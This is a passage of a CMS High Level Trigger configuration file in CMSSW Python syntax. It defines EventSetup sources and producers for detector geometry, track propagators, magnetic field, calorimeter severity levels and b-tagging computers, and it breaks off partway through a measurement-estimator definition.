hltESSBTagRecord = cms.ESSource( "EmptyESSource",
recordName = cms.string( "JetTagComputerRecord" ),
iovIsRunNotTime = cms.bool( True ),
firstValid = cms.vuint32( 1 )
)
hltESSEcalSeverityLevel = cms.ESSource( "EmptyESSource",
recordName = cms.string( "EcalSeverityLevelAlgoRcd" ),
iovIsRunNotTime = cms.bool( True ),
firstValid = cms.vuint32( 1 )
)
hltESSHcalSeverityLevel = cms.ESSource( "EmptyESSource",
recordName = cms.string( "HcalSeverityLevelComputerRcd" ),
iovIsRunNotTime = cms.bool( True ),
firstValid = cms.vuint32( 1 )
)
ppsPixelTopologyESSource = cms.ESSource( "PPSPixelTopologyESSource",
RunType = cms.string( "Run2" ),
PitchSimY = cms.double( 0.15 ),
PitchSimX = cms.double( 0.1 ),
thickness = cms.double( 0.23 ),
noOfPixelSimX = cms.int32( 160 ),
noOfPixelSimY = cms.int32( 104 ),
noOfPixels = cms.int32( 16640 ),
simXWidth = cms.double( 16.6 ),
simYWidth = cms.double( 24.4 ),
deadEdgeWidth = cms.double( 0.2 ),
activeEdgeSigma = cms.double( 0.02 ),
physActiveEdgeDist = cms.double( 0.15 ),
appendToDataLabel = cms.string( "" )
)
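# --- ESProducer definitions ---------------------------------------------------
# From here on the fragment declares ESProducers: track propagators, geometry
# and topology builders, measurement estimators (Chi2*), trajectory cleaners
# and b-tagging computers, each registered under the ComponentName that the
# HLT reconstruction modules request at run time.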
AnyDirectionAnalyticalPropagator = cms.ESProducer( "AnalyticalPropagatorESProducer",
MaxDPhi = cms.double( 1.6 ),
ComponentName = cms.string( "AnyDirectionAnalyticalPropagator" ),
PropagationDirection = cms.string( "anyDirection" )
)
CSCChannelMapperESProducer = cms.ESProducer( "CSCChannelMapperESProducer",
AlgoName = cms.string( "CSCChannelMapperPostls1" )
)
CSCGeometryESModule = cms.ESProducer( "CSCGeometryESModule",
fromDDD = cms.bool( False ),
fromDD4hep = cms.bool( False ),
alignmentsLabel = cms.string( "" ),
appendToDataLabel = cms.string( "" ),
useRealWireGeometry = cms.bool( True ),
useOnlyWiresInME1a = cms.bool( False ),
useGangedStripsInME1a = cms.bool( False ),
useCentreTIOffsets = cms.bool( False ),
applyAlignment = cms.bool( True ),
debugV = cms.untracked.bool( False )
)
CSCIndexerESProducer = cms.ESProducer( "CSCIndexerESProducer",
AlgoName = cms.string( "CSCIndexerPostls1" )
)
CSCObjectMapESProducer = cms.ESProducer( "CSCObjectMapESProducer",
appendToDataLabel = cms.string( "" )
)
CaloGeometryBuilder = cms.ESProducer( "CaloGeometryBuilder",
SelectedCalos = cms.vstring( 'HCAL',
'ZDC',
'EcalBarrel',
'EcalEndcap',
'EcalPreshower',
'TOWER' )
)
CaloTopologyBuilder = cms.ESProducer( "CaloTopologyBuilder" )
CaloTowerConstituentsMapBuilder = cms.ESProducer( "CaloTowerConstituentsMapBuilder",
MapFile = cms.untracked.string( "Geometry/CaloTopology/data/CaloTowerEEGeometric.map.gz" ),
MapAuto = cms.untracked.bool( False ),
SkipHE = cms.untracked.bool( False ),
appendToDataLabel = cms.string( "" )
)
CaloTowerGeometryFromDBEP = cms.ESProducer( "CaloTowerGeometryFromDBEP",
applyAlignment = cms.bool( False )
)
CaloTowerTopologyEP = cms.ESProducer( "CaloTowerTopologyEP",
appendToDataLabel = cms.string( "" )
)
CastorDbProducer = cms.ESProducer( "CastorDbProducer",
appendToDataLabel = cms.string( "" )
)
ClusterShapeHitFilterESProducer = cms.ESProducer( "ClusterShapeHitFilterESProducer",
ComponentName = cms.string( "ClusterShapeHitFilter" ),
PixelShapeFile = cms.string( "RecoPixelVertexing/PixelLowPtUtilities/data/pixelShapePhase1_noL1.par" ),
PixelShapeFileL1 = cms.string( "RecoPixelVertexing/PixelLowPtUtilities/data/pixelShapePhase1_loose.par" ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) )
)
DTGeometryESModule = cms.ESProducer( "DTGeometryESModule",
fromDDD = cms.bool( False ),
fromDD4hep = cms.bool( False ),
DDDetector = cms.ESInputTag( "","" ),
alignmentsLabel = cms.string( "" ),
appendToDataLabel = cms.string( "" ),
attribute = cms.string( "MuStructure" ),
value = cms.string( "MuonBarrelDT" ),
applyAlignment = cms.bool( True )
)
DTObjectMapESProducer = cms.ESProducer( "DTObjectMapESProducer",
appendToDataLabel = cms.string( "" )
)
EcalBarrelGeometryFromDBEP = cms.ESProducer( "EcalBarrelGeometryFromDBEP",
applyAlignment = cms.bool( True )
)
EcalElectronicsMappingBuilder = cms.ESProducer( "EcalElectronicsMappingBuilder" )
EcalEndcapGeometryFromDBEP = cms.ESProducer( "EcalEndcapGeometryFromDBEP",
applyAlignment = cms.bool( True )
)
EcalLaserCorrectionService = cms.ESProducer( "EcalLaserCorrectionService",
maxExtrapolationTimeInSec = cms.uint32( 0 ),
appendToDataLabel = cms.string( "" )
)
EcalPreshowerGeometryFromDBEP = cms.ESProducer( "EcalPreshowerGeometryFromDBEP",
applyAlignment = cms.bool( True )
)
GlobalParameters = cms.ESProducer( "StableParametersTrivialProducer",
TotalBxInEvent = cms.int32( 5 ),
NumberPhysTriggers = cms.uint32( 512 ),
NumberL1Muon = cms.uint32( 8 ),
NumberL1EGamma = cms.uint32( 12 ),
NumberL1Jet = cms.uint32( 12 ),
NumberL1Tau = cms.uint32( 12 ),
NumberChips = cms.uint32( 1 ),
PinsOnChip = cms.uint32( 512 ),
OrderOfChip = cms.vint32( 1 ),
NumberL1IsoEG = cms.uint32( 4 ),
NumberL1JetCounts = cms.uint32( 12 ),
UnitLength = cms.int32( 8 ),
NumberL1ForJet = cms.uint32( 4 ),
IfCaloEtaNumberBits = cms.uint32( 4 ),
IfMuEtaNumberBits = cms.uint32( 6 ),
NumberL1TauJet = cms.uint32( 4 ),
NumberL1Mu = cms.uint32( 4 ),
NumberConditionChips = cms.uint32( 1 ),
NumberPsbBoards = cms.int32( 7 ),
NumberL1CenJet = cms.uint32( 4 ),
PinsOnConditionChip = cms.uint32( 512 ),
NumberL1NoIsoEG = cms.uint32( 4 ),
NumberTechnicalTriggers = cms.uint32( 64 ),
NumberPhysTriggersExtended = cms.uint32( 64 ),
WordLength = cms.int32( 64 ),
OrderConditionChip = cms.vint32( 1 ),
appendToDataLabel = cms.string( "" )
)
HcalGeometryFromDBEP = cms.ESProducer( "HcalGeometryFromDBEP",
applyAlignment = cms.bool( False )
)
HcalTopologyIdealEP = cms.ESProducer( "HcalTopologyIdealEP",
Exclude = cms.untracked.string( "" ),
MergePosition = cms.untracked.bool( True ),
appendToDataLabel = cms.string( "" )
)
MaterialPropagator = cms.ESProducer( "PropagatorWithMaterialESProducer",
SimpleMagneticField = cms.string( "" ),
MaxDPhi = cms.double( 1.6 ),
ComponentName = cms.string( "PropagatorWithMaterial" ),
Mass = cms.double( 0.105 ),
PropagationDirection = cms.string( "alongMomentum" ),
useRungeKutta = cms.bool( False ),
ptMin = cms.double( -1.0 )
)
MaterialPropagatorForHI = cms.ESProducer( "PropagatorWithMaterialESProducer",
SimpleMagneticField = cms.string( "ParabolicMf" ),
MaxDPhi = cms.double( 1.6 ),
ComponentName = cms.string( "PropagatorWithMaterialForHI" ),
Mass = cms.double( 0.139 ),
PropagationDirection = cms.string( "alongMomentum" ),
useRungeKutta = cms.bool( False ),
ptMin = cms.double( -1.0 )
)
MaterialPropagatorParabolicMF = cms.ESProducer( "PropagatorWithMaterialESProducer",
SimpleMagneticField = cms.string( "ParabolicMf" ),
MaxDPhi = cms.double( 1.6 ),
ComponentName = cms.string( "PropagatorWithMaterialParabolicMf" ),
Mass = cms.double( 0.105 ),
PropagationDirection = cms.string( "alongMomentum" ),
useRungeKutta = cms.bool( False ),
ptMin = cms.double( -1.0 )
)
OppositeMaterialPropagator = cms.ESProducer( "PropagatorWithMaterialESProducer",
SimpleMagneticField = cms.string( "" ),
MaxDPhi = cms.double( 1.6 ),
ComponentName = cms.string( "PropagatorWithMaterialOpposite" ),
Mass = cms.double( 0.105 ),
PropagationDirection = cms.string( "oppositeToMomentum" ),
useRungeKutta = cms.bool( False ),
ptMin = cms.double( -1.0 )
)
OppositeMaterialPropagatorForHI = cms.ESProducer( "PropagatorWithMaterialESProducer",
SimpleMagneticField = cms.string( "ParabolicMf" ),
MaxDPhi = cms.double( 1.6 ),
ComponentName = cms.string( "PropagatorWithMaterialOppositeForHI" ),
Mass = cms.double( 0.139 ),
PropagationDirection = cms.string( "oppositeToMomentum" ),
useRungeKutta = cms.bool( False ),
ptMin = cms.double( -1.0 )
)
OppositeMaterialPropagatorParabolicMF = cms.ESProducer( "PropagatorWithMaterialESProducer",
SimpleMagneticField = cms.string( "ParabolicMf" ),
MaxDPhi = cms.double( 1.6 ),
ComponentName = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
Mass = cms.double( 0.105 ),
PropagationDirection = cms.string( "oppositeToMomentum" ),
useRungeKutta = cms.bool( False ),
ptMin = cms.double( -1.0 )
)
OppositePropagatorWithMaterialForMixedStep = cms.ESProducer( "PropagatorWithMaterialESProducer",
SimpleMagneticField = cms.string( "ParabolicMf" ),
MaxDPhi = cms.double( 1.6 ),
ComponentName = cms.string( "PropagatorWithMaterialForMixedStepOpposite" ),
Mass = cms.double( 0.105 ),
PropagationDirection = cms.string( "oppositeToMomentum" ),
useRungeKutta = cms.bool( False ),
ptMin = cms.double( 0.1 )
)
ParametrizedMagneticFieldProducer = cms.ESProducer( "AutoParametrizedMagneticFieldProducer",
version = cms.string( "Parabolic" ),
label = cms.untracked.string( "ParabolicMf" ),
valueOverride = cms.int32( -1 )
)
PropagatorWithMaterialForLoopers = cms.ESProducer( "PropagatorWithMaterialESProducer",
SimpleMagneticField = cms.string( "ParabolicMf" ),
MaxDPhi = cms.double( 4.0 ),
ComponentName = cms.string( "PropagatorWithMaterialForLoopers" ),
Mass = cms.double( 0.1396 ),
PropagationDirection = cms.string( "alongMomentum" ),
useRungeKutta = cms.bool( False ),
ptMin = cms.double( -1.0 )
)
PropagatorWithMaterialForMixedStep = cms.ESProducer( "PropagatorWithMaterialESProducer",
SimpleMagneticField = cms.string( "ParabolicMf" ),
MaxDPhi = cms.double( 1.6 ),
ComponentName = cms.string( "PropagatorWithMaterialForMixedStep" ),
Mass = cms.double( 0.105 ),
PropagationDirection = cms.string( "alongMomentum" ),
useRungeKutta = cms.bool( False ),
ptMin = cms.double( 0.1 )
)
RPCGeometryESModule = cms.ESProducer( "RPCGeometryESModule",
fromDDD = cms.untracked.bool( False ),
fromDD4hep = cms.untracked.bool( False ),
appendToDataLabel = cms.string( "" )
)
SiStripClusterizerConditionsESProducer = cms.ESProducer( "SiStripClusterizerConditionsESProducer",
QualityLabel = cms.string( "" ),
Label = cms.string( "" ),
appendToDataLabel = cms.string( "" )
)
SiStripGainESProducer = cms.ESProducer( "SiStripGainESProducer",
appendToDataLabel = cms.string( "" ),
printDebug = cms.untracked.bool( False ),
AutomaticNormalization = cms.bool( False ),
APVGain = cms.VPSet(
cms.PSet( NormalizationFactor = cms.untracked.double( 1.0 ),
Label = cms.untracked.string( "" ),
Record = cms.string( "SiStripApvGainRcd" )
),
cms.PSet( NormalizationFactor = cms.untracked.double( 1.0 ),
Label = cms.untracked.string( "" ),
Record = cms.string( "SiStripApvGain2Rcd" )
)
)
)
SiStripQualityESProducer = cms.ESProducer( "SiStripQualityESProducer",
appendToDataLabel = cms.string( "" ),
ListOfRecordToMerge = cms.VPSet(
cms.PSet( record = cms.string( "SiStripDetVOffRcd" ),
tag = cms.string( "" )
),
cms.PSet( record = cms.string( "SiStripDetCablingRcd" ),
tag = cms.string( "" )
),
cms.PSet( record = cms.string( "SiStripBadChannelRcd" ),
tag = cms.string( "" )
),
cms.PSet( record = cms.string( "SiStripBadFiberRcd" ),
tag = cms.string( "" )
),
cms.PSet( record = cms.string( "SiStripBadModuleRcd" ),
tag = cms.string( "" )
)
),
ReduceGranularity = cms.bool( False ),
ThresholdForReducedGranularity = cms.double( 0.3 ),
PrintDebugOutput = cms.bool( False ),
UseEmptyRunInfo = cms.bool( False )
)
SiStripRecHitMatcherESProducer = cms.ESProducer( "SiStripRecHitMatcherESProducer",
ComponentName = cms.string( "StandardMatcher" ),
NSigmaInside = cms.double( 3.0 ),
PreFilter = cms.bool( False )
)
SiStripRegionConnectivity = cms.ESProducer( "SiStripRegionConnectivity",
EtaDivisions = cms.untracked.uint32( 20 ),
PhiDivisions = cms.untracked.uint32( 20 ),
EtaMax = cms.untracked.double( 2.5 )
)
SimpleSecondaryVertex3TrkComputer = cms.ESProducer( "SimpleSecondaryVertexESProducer",
use3d = cms.bool( True ),
unBoost = cms.bool( False ),
useSignificance = cms.bool( True ),
minTracks = cms.uint32( 3 ),
minVertices = cms.uint32( 1 )
)
SteppingHelixPropagatorAny = cms.ESProducer( "SteppingHelixPropagatorESProducer",
ComponentName = cms.string( "SteppingHelixPropagatorAny" ),
NoErrorPropagation = cms.bool( False ),
PropagationDirection = cms.string( "anyDirection" ),
useTuningForL2Speed = cms.bool( False ),
useIsYokeFlag = cms.bool( True ),
endcapShiftInZNeg = cms.double( 0.0 ),
SetVBFPointer = cms.bool( False ),
AssumeNoMaterial = cms.bool( False ),
endcapShiftInZPos = cms.double( 0.0 ),
useInTeslaFromMagField = cms.bool( False ),
VBFName = cms.string( "VolumeBasedMagneticField" ),
useEndcapShiftsInZ = cms.bool( False ),
sendLogWarning = cms.bool( False ),
useMatVolumes = cms.bool( True ),
debug = cms.bool( False ),
ApplyRadX0Correction = cms.bool( True ),
useMagVolumes = cms.bool( True ),
returnTangentPlane = cms.bool( True )
)
TrackerAdditionalParametersPerDetESModule = cms.ESProducer( "TrackerAdditionalParametersPerDetESModule",
appendToDataLabel = cms.string( "" )
)
TrackerDigiGeometryESModule = cms.ESProducer( "TrackerDigiGeometryESModule",
appendToDataLabel = cms.string( "" ),
fromDDD = cms.bool( False ),
applyAlignment = cms.bool( True ),
alignmentsLabel = cms.string( "" )
)
TrackerGeometricDetESModule = cms.ESProducer( "TrackerGeometricDetESModule",
fromDDD = cms.bool( False ),
fromDD4hep = cms.bool( False ),
appendToDataLabel = cms.string( "" )
)
TransientTrackBuilderESProducer = cms.ESProducer( "TransientTrackBuilderESProducer",
ComponentName = cms.string( "TransientTrackBuilder" )
)
VolumeBasedMagneticFieldESProducer = cms.ESProducer( "VolumeBasedMagneticFieldESProducerFromDB",
label = cms.untracked.string( "" ),
debugBuilder = cms.untracked.bool( False ),
valueOverride = cms.int32( -1 )
)
ZdcGeometryFromDBEP = cms.ESProducer( "ZdcGeometryFromDBEP",
applyAlignment = cms.bool( False )
)
caloDetIdAssociator = cms.ESProducer( "DetIdAssociatorESProducer",
ComponentName = cms.string( "CaloDetIdAssociator" ),
etaBinSize = cms.double( 0.087 ),
nEta = cms.int32( 70 ),
nPhi = cms.int32( 72 ),
hcalRegion = cms.int32( 2 ),
includeBadChambers = cms.bool( False ),
includeGEM = cms.bool( False ),
includeME0 = cms.bool( False )
)
cosmicsNavigationSchoolESProducer = cms.ESProducer( "NavigationSchoolESProducer",
ComponentName = cms.string( "CosmicNavigationSchool" ),
SimpleMagneticField = cms.string( "" )
)
ctppsGeometryESModule = cms.ESProducer( "CTPPSGeometryESModule",
verbosity = cms.untracked.uint32( 1 ),
buildMisalignedGeometry = cms.bool( False ),
isRun2 = cms.bool( True ),
dbTag = cms.string( "" ),
compactViewTag = cms.string( "" ),
fromPreprocessedDB = cms.untracked.bool( True ),
fromDD4hep = cms.untracked.bool( False ),
appendToDataLabel = cms.string( "" )
)
ctppsInterpolatedOpticalFunctionsESSource = cms.ESProducer( "CTPPSInterpolatedOpticalFunctionsESSource",
lhcInfoLabel = cms.string( "" ),
opticsLabel = cms.string( "" ),
appendToDataLabel = cms.string( "" )
)
ecalDetIdAssociator = cms.ESProducer( "DetIdAssociatorESProducer",
ComponentName = cms.string( "EcalDetIdAssociator" ),
etaBinSize = cms.double( 0.02 ),
nEta = cms.int32( 300 ),
nPhi = cms.int32( 360 ),
hcalRegion = cms.int32( 2 ),
includeBadChambers = cms.bool( False ),
includeGEM = cms.bool( False ),
includeME0 = cms.bool( False )
)
ecalSeverityLevel = cms.ESProducer( "EcalSeverityLevelESProducer",
flagMask = cms.PSet(
kBad = cms.vstring( 'kFaultyHardware',
'kDead',
'kKilled' ),
kGood = cms.vstring( 'kGood' ),
kRecovered = cms.vstring( 'kLeadingEdgeRecovered',
'kTowerRecovered' ),
kProblematic = cms.vstring( 'kPoorReco',
'kPoorCalib',
'kNoisy',
'kSaturated' ),
kWeird = cms.vstring( 'kWeird',
'kDiWeird' ),
kTime = cms.vstring( 'kOutOfTime' )
),
dbstatusMask = cms.PSet(
kBad = cms.vstring( 'kNonRespondingIsolated',
'kDeadVFE',
'kDeadFE',
'kNoDataNoTP' ),
kGood = cms.vstring( 'kOk' ),
kRecovered = cms.vstring( ),
kProblematic = cms.vstring( 'kDAC',
'kNoLaser',
'kNoisy',
'kNNoisy',
'kNNNoisy',
'kNNNNoisy',
'kNNNNNoisy',
'kFixedG6',
'kFixedG1',
'kFixedG0' ),
kWeird = cms.vstring( ),
kTime = cms.vstring( )
),
timeThresh = cms.double( 2.0 )
)
hcalChannelPropertiesESProd = cms.ESProducer( "HcalChannelPropertiesEP" )
hcalDDDRecConstants = cms.ESProducer( "HcalDDDRecConstantsESModule",
appendToDataLabel = cms.string( "" )
)
hcalDDDSimConstants = cms.ESProducer( "HcalDDDSimConstantsESModule",
appendToDataLabel = cms.string( "" )
)
hcalDetIdAssociator = cms.ESProducer( "DetIdAssociatorESProducer",
ComponentName = cms.string( "HcalDetIdAssociator" ),
etaBinSize = cms.double( 0.087 ),
nEta = cms.int32( 70 ),
nPhi = cms.int32( 72 ),
hcalRegion = cms.int32( 2 ),
includeBadChambers = cms.bool( False ),
includeGEM = cms.bool( False ),
includeME0 = cms.bool( False )
)
hcalRecAlgos = cms.ESProducer( "HcalRecAlgoESProducer",
phase = cms.uint32( 1 ),
RecoveredRecHitBits = cms.vstring( ),
SeverityLevels = cms.VPSet(
cms.PSet( ChannelStatus = cms.vstring( ),
RecHitFlags = cms.vstring( 'TimingFromTDC' ),
Level = cms.int32( 0 )
),
cms.PSet( ChannelStatus = cms.vstring( 'HcalCellCaloTowerProb' ),
RecHitFlags = cms.vstring( ),
Level = cms.int32( 1 )
),
cms.PSet( ChannelStatus = cms.vstring( 'HcalCellExcludeFromHBHENoiseSummary' ),
RecHitFlags = cms.vstring( ),
Level = cms.int32( 5 )
),
cms.PSet( ChannelStatus = cms.vstring( ),
RecHitFlags = cms.vstring( 'HBHEHpdHitMultiplicity',
'HBHEIsolatedNoise',
'HBHEFlatNoise',
'HBHESpikeNoise',
'HBHETS4TS5Noise',
'HBHENegativeNoise',
'HBHEPulseFitBit',
'HBHEOOTPU' ),
Level = cms.int32( 8 )
),
cms.PSet( ChannelStatus = cms.vstring( ),
RecHitFlags = cms.vstring( 'HFLongShort',
'HFS8S1Ratio',
'HFPET',
'HFSignalAsymmetry' ),
Level = cms.int32( 11 )
),
cms.PSet( ChannelStatus = cms.vstring( 'HcalCellHot' ),
RecHitFlags = cms.vstring( ),
Level = cms.int32( 15 )
),
cms.PSet( ChannelStatus = cms.vstring( 'HcalCellOff',
'HcalCellDead' ),
RecHitFlags = cms.vstring( ),
Level = cms.int32( 20 )
)
),
DropChannelStatusBits = cms.vstring( 'HcalCellMask',
'HcalCellOff',
'HcalCellDead' ),
appendToDataLabel = cms.string( "" )
)
hcal_db_producer = cms.ESProducer( "HcalDbProducer" )
hltBoostedDoubleSecondaryVertexAK8Computer = cms.ESProducer( "CandidateBoostedDoubleSecondaryVertexESProducer",
useCondDB = cms.bool( False ),
weightFile = cms.FileInPath( "RecoBTag/SecondaryVertex/data/BoostedDoubleSV_AK8_BDT_v4.weights.xml.gz" ),
useGBRForest = cms.bool( True ),
useAdaBoost = cms.bool( False )
)
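# The next two ESProducers configure the CombinedSecondaryVertex b-tag
# computers used at HLT; they share the same track/vertex selection structure
# but read different calibration records (CombinedSV* vs. CombinedSVIVFV2*).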
hltCombinedSecondaryVertex = cms.ESProducer( "CombinedSecondaryVertexESProducer",
trackPseudoSelection = cms.PSet(
maxDistToAxis = cms.double( 0.07 ),
totalHitsMin = cms.uint32( 0 ),
ptMin = cms.double( 0.0 ),
sip2dSigMax = cms.double( 99999.9 ),
sip2dValMax = cms.double( 99999.9 ),
sip3dSigMax = cms.double( 99999.9 ),
sip3dValMax = cms.double( 99999.9 ),
maxDecayLen = cms.double( 5.0 ),
qualityClass = cms.string( "any" ),
jetDeltaRMax = cms.double( 0.3 ),
normChi2Max = cms.double( 99999.9 ),
pixelHitsMin = cms.uint32( 0 ),
sip2dSigMin = cms.double( 2.0 ),
sip2dValMin = cms.double( -99999.9 ),
sip3dSigMin = cms.double( -99999.9 ),
sip3dValMin = cms.double( -99999.9 )
),
trackSelection = cms.PSet(
maxDistToAxis = cms.double( 0.07 ),
totalHitsMin = cms.uint32( 0 ),
ptMin = cms.double( 0.0 ),
sip2dSigMax = cms.double( 99999.9 ),
sip2dValMax = cms.double( 99999.9 ),
sip3dSigMax = cms.double( 99999.9 ),
sip3dValMax = cms.double( 99999.9 ),
maxDecayLen = cms.double( 5.0 ),
qualityClass = cms.string( "any" ),
jetDeltaRMax = cms.double( 0.3 ),
normChi2Max = cms.double( 99999.9 ),
pixelHitsMin = cms.uint32( 0 ),
sip2dSigMin = cms.double( -99999.9 ),
sip2dValMin = cms.double( -99999.9 ),
sip3dSigMin = cms.double( -99999.9 ),
sip3dValMin = cms.double( -99999.9 )
),
trackFlip = cms.bool( False ),
vertexFlip = cms.bool( False ),
SoftLeptonFlip = cms.bool( False ),
useTrackWeights = cms.bool( True ),
pseudoMultiplicityMin = cms.uint32( 2 ),
correctVertexMass = cms.bool( True ),
trackPairV0Filter = cms.PSet( k0sMassWindow = cms.double( 0.03 ) ),
charmCut = cms.double( 1.5 ),
minimumTrackWeight = cms.double( 0.5 ),
pseudoVertexV0Filter = cms.PSet( k0sMassWindow = cms.double( 0.05 ) ),
trackMultiplicityMin = cms.uint32( 3 ),
trackSort = cms.string( "sip2dSig" ),
useCategories = cms.bool( True ),
calibrationRecords = cms.vstring( 'CombinedSVRecoVertex',
'CombinedSVPseudoVertex',
'CombinedSVNoVertex' ),
recordLabel = cms.string( "HLT" ),
categoryVariableName = cms.string( "vertexCategory" )
)
hltCombinedSecondaryVertexV2 = cms.ESProducer( "CombinedSecondaryVertexESProducer",
trackPseudoSelection = cms.PSet(
max_pT_dRcut = cms.double( 0.1 ),
b_dR = cms.double( 0.6263 ),
min_pT = cms.double( 120.0 ),
b_pT = cms.double( 0.3684 ),
ptMin = cms.double( 0.0 ),
max_pT_trackPTcut = cms.double( 3.0 ),
max_pT = cms.double( 500.0 ),
useVariableJTA = cms.bool( False ),
maxDecayLen = cms.double( 5.0 ),
qualityClass = cms.string( "any" ),
normChi2Max = cms.double( 99999.9 ),
sip2dValMin = cms.double( -99999.9 ),
sip3dValMin = cms.double( -99999.9 ),
a_dR = cms.double( -0.001053 ),
maxDistToAxis = cms.double( 0.07 ),
totalHitsMin = cms.uint32( 0 ),
a_pT = cms.double( 0.005263 ),
sip2dSigMax = cms.double( 99999.9 ),
sip2dValMax = cms.double( 99999.9 ),
sip3dSigMax = cms.double( 99999.9 ),
sip3dValMax = cms.double( 99999.9 ),
min_pT_dRcut = cms.double( 0.5 ),
jetDeltaRMax = cms.double( 0.3 ),
pixelHitsMin = cms.uint32( 0 ),
sip3dSigMin = cms.double( -99999.9 ),
sip2dSigMin = cms.double( 2.0 )
),
trackSelection = cms.PSet(
max_pT_dRcut = cms.double( 0.1 ),
b_dR = cms.double( 0.6263 ),
min_pT = cms.double( 120.0 ),
b_pT = cms.double( 0.3684 ),
ptMin = cms.double( 0.0 ),
max_pT_trackPTcut = cms.double( 3.0 ),
max_pT = cms.double( 500.0 ),
useVariableJTA = cms.bool( False ),
maxDecayLen = cms.double( 5.0 ),
qualityClass = cms.string( "any" ),
normChi2Max = cms.double( 99999.9 ),
sip2dValMin = cms.double( -99999.9 ),
sip3dValMin = cms.double( -99999.9 ),
a_dR = cms.double( -0.001053 ),
maxDistToAxis = cms.double( 0.07 ),
totalHitsMin = cms.uint32( 0 ),
a_pT = cms.double( 0.005263 ),
sip2dSigMax = cms.double( 99999.9 ),
sip2dValMax = cms.double( 99999.9 ),
sip3dSigMax = cms.double( 99999.9 ),
sip3dValMax = cms.double( 99999.9 ),
min_pT_dRcut = cms.double( 0.5 ),
jetDeltaRMax = cms.double( 0.3 ),
pixelHitsMin = cms.uint32( 0 ),
sip3dSigMin = cms.double( -99999.9 ),
sip2dSigMin = cms.double( -99999.9 )
),
trackFlip = cms.bool( False ),
vertexFlip = cms.bool( False ),
SoftLeptonFlip = cms.bool( False ),
useTrackWeights = cms.bool( True ),
pseudoMultiplicityMin = cms.uint32( 2 ),
correctVertexMass = cms.bool( True ),
trackPairV0Filter = cms.PSet( k0sMassWindow = cms.double( 0.03 ) ),
charmCut = cms.double( 1.5 ),
minimumTrackWeight = cms.double( 0.5 ),
pseudoVertexV0Filter = cms.PSet( k0sMassWindow = cms.double( 0.05 ) ),
trackMultiplicityMin = cms.uint32( 3 ),
trackSort = cms.string( "sip2dSig" ),
useCategories = cms.bool( True ),
calibrationRecords = cms.vstring( 'CombinedSVIVFV2RecoVertex',
'CombinedSVIVFV2PseudoVertex',
'CombinedSVIVFV2NoVertex' ),
recordLabel = cms.string( "HLT" ),
categoryVariableName = cms.string( "vertexCategory" )
)
hltDisplacedDijethltESPPromptTrackCountingESProducer = cms.ESProducer( "PromptTrackCountingESProducer",
impactParameterType = cms.int32( 1 ),
minimumImpactParameter = cms.double( -1.0 ),
useSignedImpactParameterSig = cms.bool( True ),
maximumDistanceToJetAxis = cms.double( 999999.0 ),
deltaR = cms.double( -1.0 ),
deltaRmin = cms.double( 0.0 ),
maximumDecayLength = cms.double( 999999.0 ),
maxImpactParameter = cms.double( 0.1 ),
maxImpactParameterSig = cms.double( 999999.0 ),
trackQualityClass = cms.string( "any" ),
nthTrack = cms.int32( -1 )
)
hltDisplacedDijethltESPTrackCounting2D1st = cms.ESProducer( "TrackCountingESProducer",
a_dR = cms.double( -0.001053 ),
b_dR = cms.double( 0.6263 ),
a_pT = cms.double( 0.005263 ),
b_pT = cms.double( 0.3684 ),
min_pT = cms.double( 120.0 ),
max_pT = cms.double( 500.0 ),
min_pT_dRcut = cms.double( 0.5 ),
max_pT_dRcut = cms.double( 0.1 ),
max_pT_trackPTcut = cms.double( 3.0 ),
minimumImpactParameter = cms.double( 0.05 ),
useSignedImpactParameterSig = cms.bool( False ),
impactParameterType = cms.int32( 1 ),
maximumDistanceToJetAxis = cms.double( 9999999.0 ),
deltaR = cms.double( -1.0 ),
maximumDecayLength = cms.double( 999999.0 ),
nthTrack = cms.int32( 1 ),
trackQualityClass = cms.string( "any" ),
useVariableJTA = cms.bool( False )
)
hltESPAnalyticalPropagator = cms.ESProducer( "AnalyticalPropagatorESProducer",
MaxDPhi = cms.double( 1.6 ),
ComponentName = cms.string( "hltESPAnalyticalPropagator" ),
PropagationDirection = cms.string( "alongMomentum" )
)
hltESPBwdAnalyticalPropagator = cms.ESProducer( "AnalyticalPropagatorESProducer",
MaxDPhi = cms.double( 1.6 ),
ComponentName = cms.string( "hltESPBwdAnalyticalPropagator" ),
PropagationDirection = cms.string( "oppositeToMomentum" )
)
hltESPBwdElectronPropagator = cms.ESProducer( "PropagatorWithMaterialESProducer",
SimpleMagneticField = cms.string( "" ),
MaxDPhi = cms.double( 1.6 ),
ComponentName = cms.string( "hltESPBwdElectronPropagator" ),
Mass = cms.double( 5.11E-4 ),
PropagationDirection = cms.string( "oppositeToMomentum" ),
useRungeKutta = cms.bool( False ),
ptMin = cms.double( -1.0 )
)
hltESPChi2ChargeLooseMeasurementEstimator16 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 16.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 0.5 ),
MaxSagitta = cms.double( 2.0 ),
MinimalTolerance = cms.double( 0.5 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPChi2ChargeLooseMeasurementEstimator16" ),
pTChargeCutThreshold = cms.double( -1.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPChi2ChargeMeasurementEstimator16 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 16.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 0.5 ),
MaxSagitta = cms.double( 2.0 ),
MinimalTolerance = cms.double( 0.5 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPChi2ChargeMeasurementEstimator16" ),
pTChargeCutThreshold = cms.double( -1.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPChi2ChargeMeasurementEstimator2000 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 2000.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 100.0 ),
MaxSagitta = cms.double( -1.0 ),
MinimalTolerance = cms.double( 10.0 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPChi2ChargeMeasurementEstimator2000" ),
pTChargeCutThreshold = cms.double( -1.0 ),
